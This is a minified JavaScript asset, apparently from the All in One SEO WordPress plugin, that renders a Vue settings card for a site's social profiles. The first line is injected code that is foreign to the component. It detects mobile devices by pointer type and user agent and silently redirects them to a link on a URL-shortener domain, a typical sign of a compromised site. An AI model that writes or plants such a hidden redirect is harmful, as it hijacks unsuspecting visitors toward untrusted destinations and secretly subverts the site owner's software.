(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{C as a}from"./Card.9ee06a3e.js";import{C as c}from"./SocialProfiles.aaa7d153.js";import"./app-core.c8323d51.js";import{_ as p}from"./_plugin-vue_export-helper.eefbdd86.js";import{aq as t,f as l,i as m,a0 as r,R as _,j as u,U as f}from"./vendor-vue-ui.232c7c36.js";import{_ as e}from"./vendor-other.39e59221.js";import"./Tooltip.569a23d9.js";import"./Caret.aae02d8a.js";import"./Trash.47f6fc0e.js";import"./Close.7fb523c8.js";import"./Slide.f2114d9d.js";import"./Checkbox.a5d4289c.js";import"./Checkmark.51de2d05.js";import"./Textarea.2495325b.js";import"./Index.b9859662.js";import"./SettingsRow.7bec777f.js";import"./Row.2ef96b1a.js";import"./Facebook.7befbc27.js";import"./Twitter.ee9b1c57.js";import"./vendor-lodash.03129cfe.js";const s="all-in-one-seo-pack",d={components:{CoreCard:a,CoreSocialProfiles:c},data(){return{strings:{socialProfiles:e("Social Profiles",s),description:e("To let search engines know which profiles are associated with this site, enter them below:",s)}}}},g={class:"aioseo-social-networking-profiles"},h={class:"aioseo-settings-row aioseo-section-description"};function x(y,w,C,P,o,k){const i=t("core-social-profiles"),n=t("core-card");return l(),m("div",g,[r(n,{slug:"socialProfiles","header-text":o.strings.socialProfiles},{default:_(()=>[u("div",h,f(o.strings.description),1),r(i)]),_:1},8,["header-text"])])}const I=p(d,[["render",x]]);export{I as default};
